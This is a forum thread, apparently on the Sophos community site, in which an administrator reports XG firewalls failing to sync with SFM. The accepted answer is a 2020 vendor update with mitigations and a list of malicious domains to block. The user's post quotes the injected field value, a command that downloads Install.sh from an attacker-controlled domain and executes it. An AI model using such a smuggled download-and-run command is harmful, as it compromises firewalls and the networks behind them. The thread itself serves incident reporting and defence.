XG firewalls connected to SFM were no longer able to connect or synchronize to SFM. - Notice the following change on the settings

Question

Hello All, 
 Weird issues we notice today the XG firewalls connected to SFM were no longer able to connect or synchronize to SFM. After looking at the settings on the XG firewalls affected we noticed that in place of the SFM IP address was this parameter: 
 ||cd /tmp/ && wget sophosfirewallupdate.com/.../Install.sh -O /tmp/x.sh && chmod 777 /tmp/x.sh && sh /tmp/x.sh|| 
 After removing this parameter and pointing it to our SFM IP we were able to get that firewall to successfully synchronize and connect to SFM. 
 What I want to know is what could have cause that settings to change. No one from our team has made this change. I believe SFM templates does not have the capability to push this settings. 
 This is very concerning and alarming and would like to know if anyone has any ideas or where to look. I already opened a case with Sophos and was on the phone with them for about 
 3 hours reviewing and grabbing logs.Thoughts on this ! - Attach screenshot of one of the XG firewall

MarcoGinocchio · Accepted Answer

**Update 2020/04/25 01:00 Pacific 
 Please visit this KBA for more information. 
 
 **UPDATE 2020/04/23 21:00 Pacific Earlier today, some customers reported a discrepancy in the SFM server address field on their Firewalls. Sophos provided initial steps to mitigate the issue and this update provides additional recommendations as we continue to investigate the issue and corrective actions. 
 
 The symptom suggests potential unauthorized access. The following mitigations have been confirmed to eliminate the issue while we automate a software-based remedy.

The issue can only manifest itself on systems that have exposed the HTTPS admin services or the User Portal on the WAN interface. To prevent this issue, choose the &ldquo;Administration&rdquo; link on the left-hand navigation panel of the management console, to get to the &ldquo;Device Access&rdquo; page illustrated below where customers must ensure that both Admin services and User Portal are deactivated on the WAN interface as highlighted: 
 Note: If you currently rely on WAN-based Admin services, we recommend you have configured one of the following BEFORE deactivating these services: 
 Administering your Firewall via Sophos Central (recommended): https://community.sophos.com/kb/en-us/127461 
 Administering your Firewall via Remote Access VPN: https://community.sophos.com/kb/en-us/133109 
 Sophos Customer Support is available to assist you in completing the steps above as necessary. Please reach us at: https://secure2.sophos.com/en-us/support/open-a-support-case.aspx

Affected firewalls have been observed communicating with the following list of unauthorized hosts. Add all the following domains (these are not Sophos domain properties) as DNS host entries and define the IP address as 52.214.97.178 (a Sophos property which will eliminate the unauthorized traffic) : 
 
 sophostraining.org 
 sophosproductupdate.com 
 sophosenterprisecenter.com 
 sophoswarehouse.com 
 Ragnarokfromasgard.com 
 sophosfirewallupdate.com For assistance on adding these domains as DNS host entries , please refer to these instructions .

Contact Sophos Support by phone or email to open a case. We will ensure you receive any future communications on this issue.

Additional screenshots for reference: